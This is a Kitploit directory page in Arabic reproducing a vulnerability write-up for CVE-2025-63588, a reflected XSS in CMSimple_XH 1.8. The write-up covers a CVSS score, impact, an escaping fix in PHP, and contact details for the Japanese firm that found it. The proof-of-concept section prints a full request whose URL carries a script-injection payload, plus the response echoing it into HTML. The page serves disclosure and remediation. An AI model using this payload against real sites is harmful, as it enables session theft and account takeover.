Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-63588 — إثبات مفهوم مفصل لـ CVE-2025-63588، وهي ثغرة XSS منعكسة في CMSimple_XH 1.8، مع تسجيل CVSS وتحليل التأثير ومثال على المعالجة الآمنة للترميز. | Kitploit
أدوات/GitHubGitHub/cybercrewinc/cve-2025-63588
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

إثبات مفهوم مفصل لـ CVE-2025-63588، وهي ثغرة XSS منعكسة في CMSimple_XH 1.8، مع تسجيل CVSS وتحليل التأثير ومثال على المعالجة الآمنة للترميز.

عرض المستودع
2منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-63588 ثغرة XSS المنعكسة في معالجة مسار cmsimplexh في CMSimple_XH)

تقدير CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (متوسط) CVE المخصص: CVE-2025-63588
المنتجات: CMSimple_XH - 1.8 المورّد: CMSimple_XH - https://www.cmsimple-xh.org/

الملخص

توجد ثغرة XSS منعكسة في كود تحليل المسار الأمامي (front‑router) في CMSimple_XH الذي يتعامل مع المدخلات المرتبطة بتسجيل الدخول الديناميكي. يعكس التطبيق البيانات التي يتحكم فيها المهاجم والمأخوذة من URI الطلب مباشرةً في HTML المُولَّد (على سبيل المثال في سمات action للنماذج و href للروابط) دون ترميز مناسب للمخرجات. يمكن للمهاجم صياغة رابط يؤدي، عند زيارته من قبل ضحية، إلى تنفيذ JavaScript تعسفية في متصفح الضحية ضمن سياق الموقع الضعيف.

هذه XSS منعكسة (غير مستمرة)؛ يتطلب الاستغلال أن يتبع الضحية رابطاً مُعدَّلاً. تم إبلاغ المورّد وتم توثيق المشكلة وتعيين CVE أعلاه.

التأثير

  • تنفيذ كود من جانب العميل — يمكن تشغيل JavaScript تعسفية في سياق الموقع.
  • كشف المعلومات — يمكن للنصوص البرمجية قراءة محتوى DOM وأي ملفات تعريف ارتباط أو رموز مميزة يمكن للعميل الوصول إليها. إذا لم يتم تعيين ملفات تعريف ارتباط الجلسة على أنها HttpOnly، يمكن سرقة رموز الجلسة.
  • اختطاف الجلسة / انتحال الشخصية — تسريب الرموز قد يسمح بالاستيلاء على الحساب اعتماداً على صلاحيات الضحية.
  • التصيد / تزييف واجهة المستخدم / إجراءات قسرية — يمكن للنصوص البرمجية المحقونة إنشاء واجهة مستخدم مزيفة، أو إعادة توجيه المستخدم، أو تقديم إجراءات ضمن جلسة الضحية.

المكوّن المتأثر

تنبع الثغرة من كود الموجه الأمامي (front router) في index.php (أو ما يعادله من وحدة التحكم الأمامية) الذي يحلل مقاطع المسار الديناميكية ويُسقطها في متغيرات الصفحة/القالب. يتم تمرير أجزاء المسار الخام (مقطع ?Templates... الذي يستخدمه موجه CMSimple_XH) إلى قوالب الصفحات ويتم حقنها في سمات HTML دون ترميز أو تنقية مناسبة لسمات HTML، مما يتيح حقن وسم <script> أو حمولات أخرى ليتم عرضها حرفياً. تم نشر مشاكل XSS منعكسة مماثلة لمكوّنات ويب أخرى وغالباً ما تنتج عن ترميز غير صحيح لمخرجات المدخلات غير الموثوقة.

إثبات المفهوم (PoC)

يُظهر إثبات المفهوم هذا انعكاس المُدخل المقدم من المهاجم في HTML المُعاد والتي سيتم تنفيذها في متصفح الضحية.

الطلب:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
صورة ملصقة 20251006200014

الاستجابة:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="https://github.com/cybercrewinc/cve-2025-63588/blob/main/cmsimplexh?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
صورة ملصقة 20251006200122

عندما يعرض متصفح الضحية هذه الصفحة، يتم تنفيذ الوسم المُحقون <script>alert(1)</script>. صورة ملصقة 20251006204432 صورة ملصقة 20251006204517

مثال PHP مقترح لإخراج سمة action بشكل آمن:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

الشكر والتقدير

الشكر والتقدير

CVE المخصص:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

المكتشف:株式会社CyberCrew / サイバークル

المراجع

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ お問い合わせ先

ご質問・ご相談などございましたら、お気軽にご連絡ください。


🏢 株式会社CyberCrew

G1@4x

📞 هاتف: 03-6853-5823
📧 بريد إلكتروني:[email protected]


📄 会社概要

項目内容
会社名株式会社CyberCrew
所在地東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 主なサービス

🛡️ セキュリティ診断・リスク評価

組織の脆弱性を多角的に分析し、最適な改善策を提案します。

💻 ペネトレーションテスト

標的型・シナリオ型・LLMペンテスト まで対応。

🌒 ダークウェブモニタリング

機密情報の流出を早期に検知し、迅速に対応。

🎯 REDチーム演習・ソーシャルエンジニアリング

実践的な攻撃シナリオに基づく防御力評価を実施。

🧠 セキュアシステム設計・コンサルティング

開発初期段階からセキュリティを考慮した設計を支援します。


🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — شريك الأمن الموثوق به.

تنزيل الأداة